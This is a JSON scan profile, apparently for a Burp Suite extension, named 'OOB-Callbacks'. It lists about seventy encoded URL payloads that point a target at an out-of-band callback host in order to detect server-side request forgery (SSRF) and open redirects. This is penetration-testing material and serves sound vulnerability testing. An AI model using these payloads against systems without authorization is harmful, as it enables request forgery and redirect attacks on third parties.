[
  {
    "ProfileName": "OOB-Callbacks",
    "Name": "",
    "Enabled": true,
    "Scanner": 1,
    "Author": "@Sy3Omda",
    "Payloads": [
      "true,%00/{BC}",
      "true,%09/{BC}",
      "true,%0a/{BC}",
      "true,%0d/{BC}",
      "true,1/_https@{BC}",
      "true,%5C%5C{BC}/%252e%252e%252f",
      "true,/%5c{BC}",
      "true,%5C{BC}",
      "true,%5c{BC}/%2f%2e%2e",
      "true,../{BC}",
      "true,.{BC}",
      "true,////\\;@{BC}",
      "true,///{BC}",
      "true,///{BC}@/",
      "true,//;@{BC}",
      "true,//\\/{BC}",
      "true,//\\@{BC}",
      "true,//\\{BC}",
      "true,//{BC}/",
      "true,//{BC}@/",
      "true,/\u003c\u003e//{BC}",
      "true,/\\/\\/{BC}",
      "true,/\\/{BC}",
      "true,/\\{BC}",
      "true,/{BC}",
      "true,\u003c\u003e//{BC}",
      "true,@{BC}",
      "true,\\/\\/{BC}",
      "true,{BC}/",
      "true,{BC};@",
      "true,//{BC}/%2F..",
      "true,/{BC}/%2F..",
      "true,///{BC}/%2f%2e%2e",
      "true,/{BC}/..;/css",
      "true,//{BC}\\t{BC}",
      "true,example%E3%80%82com",
      "true,https://%09/{BC}",
      "true,https:%0a%0d{BC}",
      "true,https://%0a%0d{BC}",
      "true,https://%23.{BC}",
      "true,https://%2f%2f.{BC}",
      "true,https%3a%2f%2f{BC}%2f",
      "true,https://%3F.{BC}",
      "true,https://%5c%5c.{BC}",
      "true,https://%5c{BC}@",
      "true,https://:80#@{BC}",
      "true,https://:80?@{BC}",
      "true,//https://{BC}@/",
      "true,/https:{BC}",
      "true,@https://{BC}",
      "true,https://.{BC}",
      "true,https://////{BC}",
      "true,https:///{BC}",
      "true,https://:@\\@{BC}",
      "true,https://;@{BC}",
      "true,https:/\\/\\{BC}",
      "true,https:/\\{BC}",
      "true,https:/{BC}",
      "true,https:{BC}",
      "true,https:///{BC}/%2e%2e",
      "true,https:///{BC}/%2f%2e%2e",
      "true,https://:@{BC}\\@{BC}",
      "true,https://{BC}/{BC}",
      "true,https:///{BC}@{BC}/%2e%2e",
      "true,https:///{BC}@{BC}/%2f%2e%2e",
      "true,https://{BC}/https://{BC}",
      "true,https://:@{BC}\\@WillBeReplaced.com",
      "true,https://\\t{BC}",
      "true,https://www.\\.{BC}",
      "true,//\\t{BC}"
    ],
    "Encoder": [],
    "UrlEncode": false,
    "CharsToUrlEncode": "",
    "Grep": [],
    "Tags": [
      "Collaborator",
      "All"
    ],
    "PayloadResponse": false,
    "NotResponse": false,
    "TimeOut1": "",
    "TimeOut2": "",
    "isTime": false,
    "contentLength": "",
    "iscontentLength": false,
    "CaseSensitive": false,
    "ExcludeHTTP": false,
    "OnlyHTTP": false,
    "IsContentType": false,
    "ContentType": "",
    "HttpResponseCode": "",
    "NegativeCT": false,
    "IsResponseCode": false,
    "ResponseCode": "",
    "NegativeRC": false,
    "urlextension": "",
    "isurlextension": false,
    "NegativeUrlExtension": false,
    "MatchType": 1,
    "Scope": 0,
    "RedirType": 4,
    "MaxRedir": 9,
    "payloadPosition": 1,
    "payloadsFile": "",
    "grepsFile": "",
    "IssueName": "OOB-Callbacks",
    "IssueSeverity": "Medium",
    "IssueConfidence": "Firm",
    "IssueDetail": "Payload: \u003cpayload\u003e\u003cbr\u003e\u003cbr\u003e\nThis issue could be ssrf callback or simply open redirect\u003cbr\u003e",
    "RemediationDetail": "",
    "IssueBackground": "",
    "RemediationBackground": "",
    "Header": [],
    "VariationAttributes": [],
    "InsertionPointType": [
      65,
      1,
      0,
      37
    ],
    "Scanas": false,
    "Scantype": 0,
    "pathDiscovery": false
  }
]